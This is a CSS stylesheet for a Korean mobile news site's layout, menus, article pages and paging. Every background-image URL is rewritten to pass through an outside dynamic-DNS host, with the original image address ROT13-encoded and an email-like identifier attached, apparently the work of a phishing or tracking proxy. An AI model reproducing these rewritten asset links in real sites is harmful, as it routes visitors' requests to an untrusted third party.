@charset "UTF-8";
* {
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -webkit-text-size-adjust: none;
}

body {
  width: 100%;
  margin: 0;
  padding: 0;
  font-family: "Noto Sans KR", "맑은 고딕", "Malgun Gothic", "open sans", Arial, sans-serif;
  color: #000;
  font-size: 14px;
  font-weight: 400;
  letter-spacing: -0.07em;
}

#wrap {
  position: relative;
  margin: 0 auto;
}

/* 공통 시작 */
.bt {
  border-top: 1px solid #e8e8e8;
}

.bb {
  border-bottom: 1px solid #e8e8e8;
}

.br {
  border-right: 1px solid #e8e8e8;
}

.bl {
  border-left: 1px solid #e8e8e8;
}

.h10 {
  height: 10px;
  clear: both;
}

.h12 {
  height: 12px;
  clear: both;
}

.h15 {
  height: 15px;
  clear: both;
}

.h20 {
  height: 20px;
  clear: both;
}

.h23 {
  height: 23px;
  clear: both;
}

.h25 {
  height: 25px;
  clear: both;
}

.h30 {
  height: 30px;
  clear: both;
}

.h35 {
  height: 35px;
  clear: both;
}

.h40 {
  height: 40px;
  clear: both;
}

.h43 {
  height: 43px;
  clear: both;
}

.h45 {
  height: 45px;
  clear: both;
}

.h50 {
  height: 50px;
  clear: both;
}

.h55 {
  height: 55px;
  clear: both;
}

.m_t_15 {
  margin-top: 15px !important;
}

.m_t_30 {
  margin-top: 30px;
}

.m_b_15 {
  margin-bottom: 15px;
}

.m_b_20 {
  margin-bottom: 20px;
}

.m_b_25 {
  margin-bottom: 25px;
}

.m_b_30 {
  margin-bottom: 30px;
}

.m_b_40 {
  margin-bottom: 40px;
}

.p_b_20 {
  padding-bottom: 20px;
}

.p_b_25 {
  padding-bottom: 25px;
}

.image_caption {
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
  display: block;
  position: relative;
  background-color: #333;
  color: white;
  font-size: 12px;
  padding: 5px 10px;
  max-width: 100% !important;
  text-align: left !important;
}

.blind {
  display: none;
}

.clear {
  clear: both;
}

.clear_fix:after {
  content: '';
  display: block;
  clear: both;
}

.date {
  letter-spacing: -0.05em;
}

.txtl {
  text-align: left;
}

.txtc {
  text-align: center;
}

.p_space {
  height: 10px;
  background-color: #c5c5c5;
}

.li_space {
  height: 25px;
  background-color: #c5c5c5;
}

.banner {
  width: 100%;
  display: block;
}

.btn_top_wrap {
  position: fixed;
  bottom: 60px;
  width: 100%;
  max-width: 600px;
  z-index: 1001;
}

.btn_top_wrap > div {
  position: relative;
  width: 100%;
  margin: 0 auto;
}

.btn_top_wrap .btn_top {
  background: #fff url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Soga_gbc.cat) center center no-repeat;
  width: 35px;
  height: 35px;
  border: 1px solid #d3d3d3;
  cursor: pointer;
  position: absolute;
  right: 10px;
  bottom: 10px;
  z-index: 1000;
}

/*.move_top {
    position: fixed;
    bottom: 65px;
    right: 15px;
    display: block;
    width: 42px;
    height: 42px;
    background: #fff url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Soga_gbc.cat") no-repeat center center;
    background-size: 42px;
}*/
/* 공통 끝 */
/* 헤더 시작 */
#header {
  width: 100%;
  background-color: #fff;
  position: relative;
  height: 50px;
  border-bottom: 1px solid #ebebeb;
}

#header:after {
	content:'';
	clear:both;
	display:block;
}

#header .left {
  float: left;
  width: 30%;
  height: 100%;
}

#header .left .btn_menu {
  position: absolute;
  left: 15px;
  top: 19px;
}

#header h1 {
  float: left;
  width: 40%;
}

#header h1 img {
  position: absolute;
  left: 50%;
  top: 10px;
  -webkit-transform: translateX(-50%);
          transform: translateX(-50%);
  max-width: 125px;
  max-height: 30px;
}

#header .right {
  float: right;
  width: 30%;
  height: 100%;
}

#header .right .btn_search {
  position: absolute;
  right: 15px;
  top: 16px;
}

#header .right .ipt_search {
  width: 100px;
  display: inline-block;
  position: absolute;
  right: 20px;
  margin-right: 15%;
  display: none;
}

#header .section_main_title {
  display: none;
}

#header.section_main h1 {
  float: none;
  position: absolute;
  left: 0;
  top: 0;
}

#header.section_main h1 img {
  position: absolute;
  left: 70px;
  top: 17px;
  margin-left: -28px;
  width: 73px;
}

#header.section_main .section_main_title {
  display: block;
  float: left;
  width: 40%;
  font-size: 19px;
  line-height: 50px;
  text-align: center;
}

.btn_menu {
  display: inline-block;
  -webkit-transition: all .4s;
  transition: all .4s;
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
  position: relative;
  width: 17px;
  height: 12px;
}

.btn_menu span {
  display: inline-block;
  -webkit-transition: all .4s;
  transition: all .4s;
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
  position: absolute;
  left: 0;
  width: 100%;
  height: 2px;
  background-color: #005629;
}

.btn_menu span:nth-of-type(1) {
  top: 0;
}

.btn_menu span:nth-of-type(2) {
  top: 5px;
}

.btn_menu span:nth-of-type(3) {
  bottom: 0;
}

.search_wrap {
  width: 100%;
  padding: 5px 10px;
  background-color: #fff;
  position: relative;
  display: none;
}

.search_wrap .ipt_search_wrap {
  display: block;
  width: 100%;
  padding-right: 60px;
  height: 35px;
}

.search_wrap .ipt_search_wrap .ipt_search {
  height: 30px;
  padding: 0 10px;
  vertical-align: middle;
  width: 100%;
  border: 1px solid #ddd;
}

.search_wrap .search_submit {
  position: absolute;
  top: 5px;
  right: 10px;
  padding: 0;
  width: 61px;
  height: 30px;
  line-height: 23px;
  text-align: center;
  vertical-align: middle;
  background-color: #fff;
  border: 1px solid #ddd;
  font-size: 14px;
  font-family: 'Malgun Gothic', '맑은고딕', HelveticaNeue, DroidSans, Sans-serif, Helvetica;
}

.search_wrap .ipt_search_wrap .ipt_search::-webkit-input-placeholder {
  /* WebKit browsers */
  color: #ddd;
}

.search_wrap .ipt_search_wrap .ipt_search:-moz-placeholder {
  /* Mozilla Firefox 4 to 18 */
  color: #ddd;
}

.search_wrap .ipt_search_wrap .ipt_search::-moz-placeholder {
  /* Mozilla Firefox 19+ */
  color: #ddd;
}

.search_wrap .ipt_search_wrap .ipt_search:-ms-input-placeholder {
  /* Internet Explorer 10+ */
  color: #ddd;
}

.tab_menu {
  border-bottom: 1px solid #ddd;
  padding: 0 5px;
  height: 40px;
  width: 100%;
  overflow-x: auto;
  overflow-y: hidden;
  clear: both;
}

.tab_menu ul {
  /*width: 1000px;*/
  width: 100%;
}

.tab_menu ul:after {
  content: '';
  clear: both;
  display: block;
}

.tab_menu ul li {
  float: left;
  font-size: 16px;
  line-height: 37px;
  text-align: center;
  padding: 0 10px;
  width: 25%;
}

.tab_menu ul li a {
  display: block;
  color: #272727;
}

.tab_menu ul li.on, .tab_menu ul li:hover {
  border-bottom: 3px solid #e62117;
}

.tab_menu ul li.on a,
.tab_menu ul li:hover a {
  display: block;
  color: #e62117;
}

.tab_menu::-webkit-scrollbar {
  display: none;
}

/* 헤더 끝 */
/* 메뉴 시작 */
.menu_back {
  position: fixed;
  width: 100%;
  height: 100%;
  background-color: #000;
  opacity: 0.3;
  z-index: 100;
  overflow: hidden;
}

#menu {
  position: fixed;
  left: -260px;
  top: 0;
  width: 260px;
  height: 100%;
  background-color: #fff;
  z-index: 1002;
  font-size: 10px;
  overflow: auto;
}

#menu .top {
  height: 50px;
  padding: 0 15px;
  position: relative;
  border-bottom: 1px solid #d7d7d7;
}

#menu .top .menu_logo {
  position: absolute;
  left: 20px;
  top: 50%;
  -webkit-transform: translateY(-50%);
          transform: translateY(-50%);
  max-width: 120px;
  max-height: 35px;
}

#menu .top .menu_close {
  position: absolute;
  right: 20px;
  top: 50%;
  margin-top: -8px;
  cursor: pointer;
  width: 16px;
}

#menu .menu_sns_wrap {
  width: 100%;
  padding: 10px 20px;
  position: relative;
  border-bottom: 1px solid #d7d7d7;
  text-align: center;
}

#menu .menu_sns_wrap .sns_link {
  display: inline-block;
  vertical-align: middle;
}

#menu .menu_sns_wrap .sns_link a {
  display: inline-block;
  margin: 0 6px;
}

#menu .menu_report_wrap {
  padding: 0 15px 15px 15px;
}

#menu .menu_report_wrap .menu_report {
  width: 100%;
  height: 30px;
  line-height: 28px;
  background: #fff;
  border: 1px solid #dddddd;
  text-align: center;
  font-size: 15px;
  color: #424242;
}

#menu .menu_search_wrap {
  width: 100%;
  padding: 10px 20px;
  position: relative;
  border-bottom: 1px solid #d7d7d7;
}

#menu .menu_search_wrap .ipt_search_wrap {
  display: block;
  width: 100%;
  padding-right: 60px;
  height: 30px;
}

#menu .menu_search_wrap .ipt_search_wrap .ipt_search {
  height: 30px;
  padding: 0 10px;
  vertical-align: middle;
  width: 100%;
  border: 0;
  background: #edecec;
  color: #909090;
  font-size: 13px;
}

#menu .menu_search_wrap .search_submit {
  position: absolute;
  top: 10px;
  right: 20px;
  padding: 0;
  width: 61px;
  height: 30px;
  line-height: 23px;
  text-align: center;
  vertical-align: middle;
  background-color: #fff;
  border: 1px solid #ddd;
  font-size: 14px;
  font-family: 'Malgun Gothic', '맑은고딕', HelveticaNeue, DroidSans, Sans-serif, Helvetica;
}

#menu #lnb {
  border-bottom: 1px solid #d7d7d7;
  padding: 0;
}

#menu #lnb:after {
  content: '';
  clear: both;
  display: block;
}

#menu #lnb > ul.lnb {
  width: 100%;
}

#menu #lnb > ul.lnb > li {
  width: 100%;
  font-size: 16px;
  text-align: left;
  background-color: #fff;
  letter-spacing: -0.075em;
}

#menu #lnb > ul.lnb > li.title {
  background-color: #fff;
  font-weight: 100;
  font-size: 16px;
}

#menu #lnb > ul.lnb > li.title a {
  color: #333333;
}

#menu #lnb > ul.lnb > li > a {
  padding-left: 20px;
  color: #000;
  display: block;
  line-height: 40px;
}

#menu #lnb ul li ul {
  border-bottom: 0;
  border-top: 0;
}

#menu #lnb ul li ul:after {
  content: '';
  clear: both;
  display: block;
}

#menu #lnb ul li ul li {
  font-size: 14px;
  line-height: 30px;
}

#menu #lnb ul li ul li a {
  color: #888;
  padding: 5px 0 5px 20px;
}

/* 메뉴 끝 */
/* 컨테이너 시작 */
#container {
  width: 100%;
  background: #fff;
}

#container .banner {
  width: 100%;
}

#container .banner img {
  width: 100%;
}

/* 컨테이너 끝 */
/* 리스트 시작 */
.page {
  text-align: center;
  padding: 20px 0;
  background-color: #fff;
}

.page > a {
  display: inline-block;
  width: 38px;
  height: 31px;
  line-height: 31px;
  border: 1px solid #d6d6d6;
  vertical-align: middle;
}

.page > a.prev {
  background: transparent url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Scntr_ceri.tvs) center center no-repeat;
  text-indent: -99999px;
}

.page > a.next {
  background: transparent url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Scntr_arkg.tvs) center center no-repeat;
  text-indent: -99999px;
}

.page > .paging {
  display: inline-block;
  margin: 0 5px;
}

.page > .paging > a {
  float: left;
  width: 38px;
  height: 31px;
  line-height: 29px;
  border: 1px solid #d6d6d6;
  color: #7d807d;
  vertical-align: middle;
  font-size: 2em;
}

.page > .paging > a.on {
  background-color: #757575;
  border: 0;
  color: #fff;
  line-height: 31px;
}

.page > .paging > a + a {
  border-left: 0;
}

/* 리스트 끝 */
/* 푸터 시작 */
.bottom_menu {
  border: 15px solid #f2f2f2;
}

.bottom_menu:after {
  content: '';
  clear: both;
  display: block;
}

.bottom_menu a {
  float: left;
  width: 33.333%;
  height: 38px;
  line-height: 38px;
  font-size: 15px;
  color: #7f7f7f;
  text-align: center;
  background-color: #fff;
  border-top: 1px solid #ebebeb;
  border-bottom: 1px solid #ebebeb;
  border-left: 1px solid #ebebeb;
}

.bottom_menu a:last-child {
  border-right: 1px solid #ebebeb;
}

#footer {
  width: 100%;
  padding: 20px 0 10px 0;
  background: #e8e8e8;
}

#footer .util {
  text-align: center;
  margin-bottom: 18px;
}

#footer .util .pc_mode {
  display: inline-block;
  vertical-align: middle;
  line-height: 35px;
  width: 120px;
  font-size: 14px;
  color: #fff;
  background: #161616;
  margin-right: 10px;
}

#footer .util .move_top {
  display: inline-block;
  vertical-align: middle;
  line-height: 35px;
  width: 120px;
  font-size: 14px;
  color: #fff;
  background: #161616;
}

#footer .addr {
  font-size: 14px;
  color: #9c9c9c;
  line-height: 16px;
  text-align: center;
  margin-bottom: 10px;
}

#footer .addr a {
  color: #e70c0c;
}

#footer .copyright {
  font-size: 12px;
  line-height: 16px;
  color: #2d2d2d;
  text-align: center;
}

/* 푸터 끝 */
/* 기사본문 시작 */
.article_view {
  padding: 0 15px;
}

.article_view .article_head {
  margin-bottom: 20px;
}

.article_view .article_head:after {
  content: '';
  clear: both;
  display: block;
}

.article_view .article_head h2 {
  font-size: 23px;
  font-weight: 600;
  line-height: 30px;
  color: #000;
  margin: 17px 0 3px 0;
}

.article_view .article_head h3 {
  font-size: 18px;
  font-weight: 500;
  line-height: 25px;
  color: #555;
  margin: 10px 0 15px 0;
  padding-left: 10px;
  border-left: 2px solid #555;
}

.article_view .article_head .utils {
  position: relative;
}

.article_view .article_head .utils .byline {
  float: left;
  padding-top: 13px;
  font-weight: 300;
  color: #777;
  font-size: 12px;
  letter-spacing: -0.05em;
}

.article_view .article_head .utils .byline .split {
  color: #d5d5d5;
  font-size: 9px;
  margin: 0 3px;
}

.article_view .article_head .utils .tools {
  float: right;
}

.article_view .article_head .utils .tools .btns {
  display: inline-block;
  margin-left: 16px;
  background-size: 50%;
}

.article_view .article_head .utils .tools .btns:after {
  content: '';
  clear: both;
  display: block;
}

.article_view .article_head .utils .tools .btns li {
  float: left;
  width: 30px;
  height: 30px;
  border: 1px solid #e3e3e3;
  border-radius: 50%;
  text-align: center;
  line-height: 28px;
  margin-left: 4px;
  color: #444;
  cursor: pointer;
}

.article_view .article_head .utils .tools .btns li.share {
  background: #FFF url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Snegvpyr_ivrj_vpba_funer.cat") no-repeat center center;
  -webkit-transition: 0.3s;
  transition: 0.3s;
}

.article_view .article_head .utils .tools .btns li.share:hover, .article_view .article_head .utils .tools .btns li.share.activity {
  background: #7A9FDF url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Snegvpyr_ivrj_vpba_funer_bire.cat") no-repeat center center;
}

.article_view .article_head .utils .tools .btns li.font_up {
  background: #FFF url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Snegvpyr_ivrj_vpba_sbaghc.cat") no-repeat center center;
  -webkit-transition: 0.3s;
  transition: 0.3s;
}

.article_view .article_head .utils .tools .btns li.font_up:hover {
  background: #7A9FDF url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Snegvpyr_ivrj_vpba_sbaghc_bire.cat") no-repeat center center;
}

.article_view .article_head .utils .tools .btns li.font_down {
  background: #FFF url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2S%2Snegvpyr_ivrj_vpba_sbagqbja.cat") no-repeat center center;
  -webkit-transition: 0.3s;
  transition: 0.3s;
}

.article_view .article_head .utils .tools .btns li.font_down:hover {
  background: #7A9FDF url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Snegvpyr_ivrj_vpba_sbagqbja_bire.cat") no-repeat center center;
}

.article_view .article_head .share_tools_mask {
  display: none;
  position: fixed;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  z-index: 3;
  background: #000;
  opacity: 0.5;
}

.article_view .article_head .share_tools {
  display: none;
  position: absolute;
  right: 0;
  top: 52px;
  width: 100%;
  padding: 23px 17px;
  border: 1px solid #D7D7D7;
  background-color: #FFF;
  z-index: 80;
}

.article_view .article_head .share_tools .top {
  padding: 0 0 20px;
}

.article_view .article_head .share_tools .top:after {
  content: '';
  clear: both;
  display: block;
}

.article_view .article_head .share_tools .top .title {
  float: left;
  font-size: 18px;
  color: #000;
}

.article_view .article_head .share_tools .top .close {
  float: right;
  margin-top: 7px;
  width: 15px;
  height: 15px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Soga_pybfr.cat) 0 0 no-repeat;
}

.article_view .article_head .share_tools .lists {
  margin-bottom: 9px;
}

.article_view .article_head .share_tools .lists:after {
  content: '';
  clear: both;
  display: block;
}

.article_view .article_head .share_tools .lists li {
  float: left;
  width: 25%;
  text-align: center;
  margin-bottom: 15px;
}

.article_view .article_head .share_tools .lists li a img {
  margin-bottom: 10px;
  width: 100%;
  max-width: 75px;
  padding: 0 10px;
}

.article_view .article_head .share_tools .lists li a span {
  display: block;
  font-size: 13px;
  color: #000;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
}

.article_view .article_head .share_tools .lists li:first-child {
  margin-left: 0;
}

.article_view .article_head .share_tools .url_copy:after {
  content: '';
  clear: both;
  display: block;
}

.article_view .article_head .share_tools .url_copy input[type="text"] {
  float: left;
  padding: 0 5px;
  width: 75%;
  height: 25px;
  font-size: 13px;
  color: #ACACAC;
  letter-spacing: 0em;
  font-weight: 300;
  line-height: 23px;
  border: 1px solid #EBEBEB;
}

.article_view .article_head .share_tools .url_copy span {
  float: left;
  display: block;
  width: 25%;
  height: 25px;
  font-size: 13px;
  line-height: 23px;
  letter-spacing: 0em;
  border: 1px solid #EBEBEB;
  border-left: 0;
  text-align: center;
}

.article_view .article_content {
  padding-bottom: 35px;
}

.article_view .article_content .figure {
	max-width:100%;
}
.article_view .article_content .figure img {
  width: 100%;
  border: 0px;
  vertical-align: middle;
  margin: auto !important;
  width: auto;
  max-width: 100% !important;
  max-height: auto !important;
  text-align: center;
}

.article_view .article_content .figure figcaption {
  font-size: 13px;
  color: #575757;
  line-height: 15px;
  margin: 6px 0 11px;
}

.article_view .article_content .img_parent img {max-width:100%; height:auto !important;}

.article_view .article_content p, .article_view .article_content > div {
  font-size: 16px;
  color: #000;
  line-height: 25px;
  min-height:25px;
  /*margin-bottom: 1.3em;*/
}

.article_view .article_content .tag {
  padding-left: 50px;
  margin-top: 30px;
  font-weight: 400;
  line-height: 20px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Svpba_gnt.cat) 0 0 no-repeat;
}

.article_view .article_content .tag ul:after {
  content: '';
  clear: both;
  display: block;
}

.article_view .article_content .tag ul li {
  float: left;
  line-height: 18px;
  height: 20px;
  font-size: 12px;
  border: 1px solid #e1e1e1;
  padding: 0 5px;
  margin-right: 5px;
}

.article_view .article_content .tag ul li a {
  color: #000;
}

.article_view .article_content .tag ul li:hover {
  background-color: #4db2ec;
  border-color: #4db2ec;
}

.article_view .article_content .tag ul li:hover a {
  color: #fff;
}

.real_news {
  padding: 0 15px;
}

.real_news h2 {
  font-size: 17px;
  margin: 15px 0 3px 0;
  color: #000;
  font-weight: 500;
}

.real_news ul {
  margin-bottom: 20px;
}

.real_news ul li {
  padding-left: 16px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Svpba_erny_arjf.cat) 5px 6px no-repeat;
  line-height: 27px;
  font-size: 15px;
  color: #000;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
}

.real_news ul li a {
  color: #000;
}

.favorite_news {
  padding: 0 0 25px 15px;
}

.favorite_news h2 {
  font-size: 18px;
  color: #000;
  line-height: 53px;
}

.favorite_news .lists {
  overflow-x: auto;
  width: 100%;
}

.favorite_news ul {
  width: 100%;
  max-width: 100%;
  display: table;
}

.favorite_news ul:after {
  content: '';
  clear: both;
  display: block;
}

.favorite_news ul li {
  display: table-cell;
  padding-right: 17px;
}

.favorite_news ul li .thumb {
  position: relative;
  width: 275px;
  height: 265px;
}

.favorite_news ul li .thumb .title {
  position: absolute;
  left: 0;
  bottom: 0;
  z-index: 5;
  color: #fff;
  line-height: 24px;
  font-size: 16px;
  padding: 0 15px;
  margin-bottom: 14px;
}

.favorite_news ul li .thumb .keyword {
  position: absolute;
  left: 15px;
  top: 11px;
  z-index: 5;
  color: #f1f1f1;
  line-height: 24px;
  font-size: 14px;
}

.favorite_news ul li .thumb .btn_share {
  position: absolute;
  right: 14px;
  top: 16px;
  z-index: 5;
  display: block;
  width: 15px;
  height: 16px;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Svpba_funer1.cat) 0 0 no-repeat;
}

.favorite_news ul li .thumb .mask {
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sarj%2Sz%2Svzntrf%2Ssnibevgr_znfx.cat) 0 0 no-repeat;
  background-size: cover;
}

/* 기사본문 끝 */
/*** 서브메인 시작 ***/
.submain_headline img {
  width: 100%;
}

.college_list .top {
  text-align: center;
  font-size: 15px;
  color: #000;
  margin: 15px 0 9px 0;
}

.college_list .list {
  overflow-x: auto;
  margin-bottom: 20px;
}

.college_list .list ul {
  margin: 0 -7px;
  padding: 0 15px;
  width: 1455px;
}

.college_list .list ul:after {
  content: '';
  clear: both;
  display: block;
}

.college_list .list ul li {
  float: left;
  padding: 0 7px;
}

.college_list .list ul li img {
  width: 75px;
  height: 75px;
  border: 1px solid #f1f1f1;
}

/*** 서브메인 끝 ***/
.datepicker > input[type="text"] {
  padding: 0 15px;
  width: 225px;
  font-size: 17px;
  height: 45px;
  line-height: 43px;
  letter-spacing: -0.05em;
  border: 1px solid #d7d7d7;
  text-align: left;
  vertical-align: middle;
}

.datepicker > .ui-datepicker-trigger {
  width: 45px;
  height: 45px;
  border: 1px solid #d7d7d7;
  border-left: none;
  background-color: #fff;
  cursor: pointer;
}

#ui-datepicker-div {
  padding: 5px;
}

#ui-datepicker-div .ui-datepicker-prev:hover,
#ui-datepicker-div .ui-datepicker-next:hover {
  background: none;
  border: none;
  cursor: pointer;
}

#ui-datepicker-div .ui-datepicker-header {
  background-color: #fff;
  border: none;
}

#ui-datepicker-div .ui-datepicker-calendar tr th {
  padding: 5px;
}

#ui-datepicker-div .ui-datepicker-calendar tr td:first-child a {
  color: #ff0000;
}

#ui-datepicker-div .ui-datepicker-calendar tr td:last-child a {
  color: #005dff;
}

#ui-datepicker-div .ui-datepicker-calendar tr td a {
  padding: 5px;
  border: none;
  background-color: #fff;
  text-align: center;
  -webkit-transition: 0.3s;
  transition: 0.3s;
}

#ui-datepicker-div .ui-datepicker-calendar tr td a.ui-state-active, #ui-datepicker-div .ui-datepicker-calendar tr td a:hover {
  color: #fff;
  background-color: #0184ff;
  border-radius: 3px;
}

#ui-datepicker-div .ui-datepicker-calendar tr td span {
  background-color: #fff;
  border: none;
  text-align: center;
}

.tab_container .tab_nav ul:after {
  content: '';
  clear: both;
  display: block;
}

.tab_container .tab_nav ul li {
  float: left;
  width: 50%;
  font-size: 16px;
  font-weight: 600;
  border-bottom: 1px solid #ddd;
  line-height: 37px;
  height: 40px;
  vertical-align: top;
  text-align: center;
}

.tab_container .tab_nav ul li a {
  color: #000;
}

.tab_container .tab_nav ul li.on {
  border-bottom: 3px solid #e41f24;
  color: #e41f24;
}

.tab_container .tab_nav ul li.on a {
  color: #e41f24;
}

.tab_container .tab_content > div {
  display: none;
}

.tab_container .tab_content > div.on {
  display: block;
}

.menu_link ul li {
  float: left;
  width: 33.333%;
  height: 36px;
  line-height: 35px;
  overflow: hidden;
  text-align: center;
  font-size: 15px;
  border-bottom: 1px solid #eaeaea;
  border-right: 1px solid #eaeaea;
}

.menu_link ul li:nth-child(3n) {
  border-right: 0;
}

.menu_link ul li a {
  color: #000;
}

.menu_link ul:after {
  content: '';
  clear: both;
  display: block;
}

.banner_more {
  width: 100%;
}

/* 썸네일 16:9 시작 
  .thumb {position:relative; width: 100% !important; height:0 !important; overflow: hidden;  padding-top: 56.25%; background: #f1efef;}
  .thumb img {width:100%; height: auto; position: absolute; top: 50%; left: 0; transform: translateY(-50%);}
  /* 썸네일 16:9 끝 */
/* 이미지 background cover 처럼 만들기 ie는 사용불가 */
.thumb img {
  -o-object-fit: cover;
     object-fit: cover;
}

/* 스킨 추가사항 시작 */
.arl_055 .lists li a {
  text-overflow: clip !important;
  white-space: normal !important;
}

.arl_056 .lists li .thumb {
  width: 70px !important;
  height: 90px !important;
}

.arl_056 .lists li .title a {
  text-overflow: clip !important;
  white-space: normal !important;
}

.arl_056 .lists li .byline {
  text-overflow: clip !important;
  white-space: normal !important;
}

/* 스킨 추가사항 끝 */


.paging{width:100%;padding:10px 0 10px;text-align:center}
.paging a{display:inline-block;overflow:hidden;width:35px;height:35px;border:1px solid #c7cbcd;border-radius:3px;background-color:#f7f7f7;vertical-align:top}
.paging .prev_page{margin-right:20px}
.paging .next_page{margin-left:20px}
.paging a span{position:static;display:inline-block;margin-top:10px;width:10px;height:15px;text-indent:-1000em}
.paging .prev_page span{background:url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sqngn%2Sfxva%2Spbagrag%2S1%2Sz01_nenZ2%2S%2Svzntrf%2Soga_nee_ye.cat) 0 0 no-repeat;background-size:24px 15px}
.paging .next_page span{background:url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggc%3N%2S%2Sz.wbheanyvfg.be.xe%2Sqngn%2Sfxva%2Spbagrag%2S1%2Sz01_nenZ2%2S%2Svzntrf%2Soga_nee_ye.cat) -14px 0 no-repeat;background-size:24px 15px}
.paging span.count{display:inline-block;height:37px;font-size:16px;font-weight:bold;color:#666;line-height:36px;vertical-align:top;font-family:'helvetica',sans-serif}
.paging span.count .vp{color:#333}
.blind {overflow:hidden;position:absolute;width:1px;height:1px;font-size:1px;line-height:1px;text-indent:4px;white-space:nowrap}

.board_w2 {font-family: 'Noto Sans KR', 'Malgun Gothic', 'Sans-serif' !important;}
.board_title {line-height:26px;}
.info_inro_ceoment {padding:0 15px;}

#container .title {
	word-break:keep-all;
}

#container .title a {
	word-break:keep-all;
}